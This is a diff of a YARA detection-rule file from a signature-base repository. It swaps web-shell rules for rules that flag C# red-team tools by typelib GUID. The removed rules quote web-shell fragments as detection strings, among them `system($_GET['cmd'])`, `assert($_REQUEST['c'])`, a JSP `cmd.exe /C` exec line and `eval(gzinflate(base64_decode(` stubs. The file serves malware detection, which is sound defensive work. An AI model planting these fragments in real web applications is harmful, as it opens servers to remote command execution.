+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2964-L2977"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "38dc8383da0859dca82cf0c943dbf16d"
-		logic_hash = "9a7635d313345e7b7cb7424726ed62015afd78412b504e406155f85c4cdf623f"
-		score = 70
+		logic_hash = "7703b24ca72770547d76ebfb8b94b5d13d9d7fa1c65cc8e2ffbf8eca30c1f8d0"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<?php $OOO000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'"
-		$s6 = "//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***"
-		$s7 = "preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(KmU(\"" fullword
+		$typelibguid0lo = "31d576fb-9fb9-455e-ab02-c78981634c65" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Winx_Shell
+rule SIGNATURE_BASE_HKTL_NET_GUID_Tikitorch : FILE
 {
 	meta:
-		description = "Web Shell - file WinX Shell.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1648-L1662"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "354ee690-a0d0-5cc5-a73b-53b916ed0169"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/rasta-mouse/TikiTorch"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2979-L2998"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "17ab5086aef89d4951fe9b7c7a561dda"
-		logic_hash = "e6dd5178cafccca751dd3f2e36206acd214a65b2e0783a738a104b3dc680ca21"
-		score = 70
+		logic_hash = "394b4e7ecb7333e7d0944690276de6d942dfa949ba04d28d5576da639a5489bc"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s5 = "print \"<font face=\\\"Verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">Filenam"
-		$s8 = "print \"<font face=\\\"Verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">File: </"
+		$typelibguid0lo = "806c6c72-4adc-43d9-b028-6872fa48d334" ascii wide
+		$typelibguid1lo = "2ef9d8f7-6b77-4b75-822b-6a53a922c30f" ascii wide
+		$typelibguid2lo = "8f5f3a95-f05c-4dce-8bc3-d0a0d4153db6" ascii wide
+		$typelibguid3lo = "1f707405-9708-4a34-a809-2c62b84d4f0a" ascii wide
+		$typelibguid4lo = "97421325-b6d8-49e5-adf0-e2126abc17ee" ascii wide
+		$typelibguid5lo = "06c247da-e2e1-47f3-bc3c-da0838a6df1f" ascii wide
+		$typelibguid6lo = "fc700ac6-5182-421f-8853-0ad18cdbeb39" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Crystal_Crystal
+rule SIGNATURE_BASE_HKTL_NET_GUID_Hivejack : FILE
 {
 	meta:
-		description = "Web Shell - file Crystal.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1663-L1677"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "10567ef4-780f-5e93-9061-3214116d6bbb"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/Viralmaniar/HiveJack"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3000-L3013"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fdbf54d5bf3264eb1c4bff1fac548879"
-		logic_hash = "735332a2ec7df65cca4ca69e702c5893d302a01c7ee7b84d01a1e6ab9646de93"
-		score = 70
+		logic_hash = "46eb7b01deb14eb7a9e1b59f04844b442a47a5c3545fa9925448349ef50e317e"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value"
-		$s6 = "\" href=\"?act=tools\"><font color=#CC0000 size=\"3\">Tools</font></a></span></f"
+		$typelibguid0lo = "e12e62fe-bea3-4989-bf04-6f76028623e3" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_R57_1_4_0
+rule SIGNATURE_BASE_HKTL_NET_GUID_Decryptautologon : FILE
 {
 	meta:
-		description = "Web Shell - file r57.1.4.0.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1678-L1694"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3ef58da9-16c1-54cf-9d06-a05680548cf5"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/securesean/DecryptAutoLogon"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3015-L3028"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "574f3303e131242568b0caf3de42f325"
-		logic_hash = "cb48621c572d529b8dc634e7b6360257ad4fce9664bfca7ee7c0101be42d2c24"
-		score = 70
+		logic_hash = "122f265f812e81aef554c1907c8397ac4ad03ff85f53254806abe36049c9b746"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "@ini_set('error_log',NULL);" fullword
-		$s6 = "$pass='abcdef1234567890abcdef1234567890';" fullword
-		$s7 = "@ini_restore(\"disable_functions\");" fullword
-		$s9 = "@ini_restore(\"safe_mode_exec_dir\");" fullword
+		$typelibguid0lo = "015a37fc-53d0-499b-bffe-ab88c5086040" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_Ajn
+rule SIGNATURE_BASE_HKTL_NET_GUID_Unstoppableservice : FILE
 {
 	meta:
-		description = "Web Shell - file ajn.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1696-L1710"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8c65fbee-d779-57a8-851b-7583be66c67a"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/malcomvetter/UnstoppableService"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3030-L3043"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "aaafafc5d286f0bff827a931f6378d04"
-		logic_hash = "0a6c9a210c0337d6b984bcf6cd7f14103a0f6f5d38a26c789519c2b1629aaede"
-		score = 70
+		logic_hash = "ad88047730485852c1d051f168b762da18a85242acf0850204dd5fc86b313390"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "seal.write \"Set WshShell = CreateObject(\"\"WScript.Shell\"\")\" & vbcrlf" fullword
-		$s6 = "seal.write \"BinaryStream.SaveToFile \"\"c:\\downloaded.zip\"\", adSaveCreateOve"
+		$typelibguid0lo = "0c117ee5-2a21-dead-beef-8cc7f0caaa86" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Cmd
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpwmi_2 : FILE
 {
 	meta:
-		description = "Web Shell - file cmd.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1711-L1726"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e6ab2f5e-2a5a-5be9-9b66-96cb745fd199"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		old_rule_name = "HKTL_NET_GUID_SharpWMI"
+		reference = "https://github.com/GhostPack/SharpWMI"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3045-L3059"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c38ae5ba61fd84f6bbbab98d89d8a346"
-		logic_hash = "d9a0802f6fd7047ba5477f6bba61c4ac02cabfce06270fdbd8e8e68a693ccf68"
-		score = 70
+		logic_hash = "968eddc046e0629fed50d77c3b6c55a6d88d4fa68f05bab77f4b43bea6ad62fc"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "if($_GET['cmd']) {" fullword
-		$s1 = "// cmd.php = Command Execution" fullword
-		$s7 = "  system($_GET['cmd']);" fullword
+		$typelibguid0lo = "6dd22880-dac5-4b4d-9c91-8c35cc7b8180" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_List
+rule SIGNATURE_BASE_HKTL_NET_GUID_Ewstoolkit : FILE
 {
 	meta:
-		description = "Web Shell - file list.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1727-L1741"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "acde7744-d17f-5e47-a5e2-ff4f4c4d8093"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/rasta-mouse/EWSToolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3061-L3074"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1cfa493a165eb4b43e6d4cc0f2eab575"
-		logic_hash = "9c8bdeb5992015b26fbee418ed6e6b7c6b0901f26bddf9dc26706c0b63ea9c95"
-		score = 70
+		logic_hash = "d8e10bc2bc8dc0b526f919eed141660555334b97f528d3a74c5b91db05394fad"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<INPUT TYPE=\"hidden\" NAME=\"type\" value=\"<%=tipo%>\">" fullword
-		$s4 = "Response.Write(\"<h3>FILE: \" & file & \"</h3>\")" fullword
+		$typelibguid0lo = "ca536d67-53c9-43b5-8bc8-9a05fdc567ed" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_PHP_Co
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sweetpotato : FILE
 {
 	meta:
-		description = "Web Shell - file co.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1742-L1756"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0e347d94-51eb-5589-93d8-b19fec7f2365"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/CCob/SweetPotato"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3076-L3090"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "62199f5ac721a0cb9b28f465a513874c"
-		logic_hash = "3fab3e97d10b6c56fb7df8bcd520bda318fc127a620c5aafba09cb36ffd6a8df"
-		score = 70
+		logic_hash = "36430e0c2874aed1d86e061f9413c16bbb4527d0d04dfb8993214920083cc30a"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "cGX6R9q733WvRRjISKHOp9neT7wa6ZAD8uthmVJV" fullword
-		$s11 = "6Mk36lz/HOkFfoXX87MpPhZzBQH6OaYukNg1OE1j" fullword
+		$typelibguid0lo = "6aeb5004-6093-4c23-aeae-911d64cacc58" ascii wide
+		$typelibguid1lo = "1bf9c10f-6f89-4520-9d2e-aaf17d17ba5e" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_PHP_150
+rule SIGNATURE_BASE_HKTL_NET_GUID_Memscan : FILE
 {
 	meta:
-		description = "Web Shell - file 150.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1757-L1771"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "35175fe1-a583-50d1-8b0c-71f19b898817"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/nccgroup/memscan"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3092-L3105"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "400c4b0bed5c90f048398e1d268ce4dc"
-		logic_hash = "139e3d6aa3cd2b6a9731a6cc14c921f9fd82ff7ca79d156f1ff6bc544897fb12"
-		score = 70
+		logic_hash = "9885512853fc46cc680b70ab26b40d4e51393b1f0b744565d4a4aa063cb78440"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "HJ3HjqxclkZfp"
-		$s1 = "<? eval(gzinflate(base64_decode('" fullword
+		$typelibguid0lo = "79462f87-8418-4834-9356-8c11e44ce189" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Cmdjsp_2
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpstay : FILE
 {
 	meta:
-		description = "Web Shell - file cmdjsp.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1772-L1786"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e5bde5a9-8e09-59ce-ad01-e29836813cf8"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/0xthirteen/SharpStay"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3107-L3120"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1b5ae3649f03784e2a5073fa4d160c8b"
-		logic_hash = "83be82e260adcff9d3d11344c363f6b5da331339ffe78e561cea9ab09b209030"
-		score = 70
+		logic_hash = "91fe0fd4bea7678df8bdb0948a0952e01b6588e07836d535f5aaa3700294d838"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /C \" + cmd);" fullword
-		$s4 = "<FORM METHOD=GET ACTION='cmdjsp.jsp'>" fullword
+		$typelibguid0lo = "2963c954-7b1e-47f5-b4fa-2fc1f0d56aea" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_PHP_C37
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharplocker : FILE
 {
 	meta:
-		description = "Web Shell - file c37.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1787-L1801"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "9525422a-d670-5475-abdc-b7ecd1ab9943"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/Pickfordmatt/SharpLocker"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3122-L3135"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d01144c04e7a46870a8dd823eb2fe5c8"
-		logic_hash = "b93394f4e05cc96c31a8adcb0981aa8b069780893c469b41ece3d3ce92c42251"
-		score = 70
+		logic_hash = "030b7a87042ce70c9de6031d0e03f07e508563f4ca2da4d6dc80e87f8bf483de"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),"
-		$s9 = "++$F; $File = urlencode($dir[$dirFILE]); $eXT = '.:'; if (strpos($dir[$dirFILE],"
+		$typelibguid0lo = "a6f8500f-68bc-4efc-962a-6c6e68d893af" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_PHP_B37
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sauroneye : FILE
 {
 	meta:
-		description = "Web Shell - file b37.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1802-L1815"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3b624dde-a63e-58ac-a4db-af931f1d8553"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/vivami/SauronEye"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3137-L3151"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0421445303cfd0ec6bc20b3846e30ff0"
-		logic_hash = "ae0cca5723a1e885c26ece5082c24f4c95f0262b8e7baf6db5efde5cfee2cc42"
-		score = 70
+		logic_hash = "feeda6aec173cb13209559dc3a156bdc3d4be6e14cbe52ffb2e1bb7bf652441a"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc"
+		$typelibguid0lo = "0f43043d-8957-4ade-a0f4-25c1122e8118" ascii wide
+		$typelibguid1lo = "086bf0ca-f1e4-4e8f-9040-a8c37a49fa26" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Backdoor
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sitrep : FILE
 {
 	meta:
-		description = "Web Shell - file php-backdoor.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1816-L1830"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5f2ac63e-4be1-520c-82b1-1957027a63e2"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/mdsecactivebreach/sitrep"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3153-L3166"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2b5cb105c4ea9b5ebc64705b4bd86bf7"
-		logic_hash = "1f754b4d29eb93316183cf904b375ded7ccdae1d2196fe05950c449ed0d690f4"
-		score = 70
+		logic_hash = "113e3a23c3f8258707f9d0c1baa143b3599e5da10928f275fca908c3a57f76e8"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))" fullword
-		$s2 = "<pre><form action=\"<? echo $PHP_SELF; ?>\" METHOD=GET >execute command: <input "
+		$typelibguid0lo = "12963497-988f-46c0-9212-28b4b2b1831b" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_Dabao
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpclipboard : FILE
 {
 	meta:
-		description = "Web Shell - file dabao.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1831-L1845"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "fd1b7786-8853-5858-ab03-da350e44f738"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/slyd0g/SharpClipboard"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3168-L3181"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3919b959e3fa7e86d52c2b0a91588d5d"
-		logic_hash = "62cf46dc16a7365d196c2cb8ede8b1380a0877d134d3726d7c777096a4eda942"
-		score = 70
+		logic_hash = "5070ae56bb7f5df31e915104ce42e18dbf86b93a327c49dabddcfbd141d468ac"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = " Echo \"<input type=button name=Submit onclick=\"\"document.location =&#039;\" &"
-		$s8 = " Echo \"document.Frm_Pack.FileName.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-"
+		$typelibguid0lo = "97484211-4726-4129-86aa-ae01d17690be" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Php_2
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcookiemonster : FILE
 {
 	meta:
-		description = "Web Shell - file 2.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1846-L1859"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "87be6949-f4f5-5a5a-b804-c627ed0f4355"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/m0rv4i/SharpCookieMonster"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3183-L3196"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "267c37c3a285a84f541066fc5b3c1747"
-		logic_hash = "bd485c825ae7ac11ff67d109d3c07fb405272a5919e00af39788d1a9c94e754d"
-		score = 70
+		logic_hash = "1aac6d1c4e1d28805ec7e61ee00d105795ce355dce6238981b22b6f7cf9d4e29"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<?php assert($_REQUEST[\"c\"]);?> " fullword
+		$typelibguid0lo = "566c5556-1204-4db9-9dc8-a24091baaa8e" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
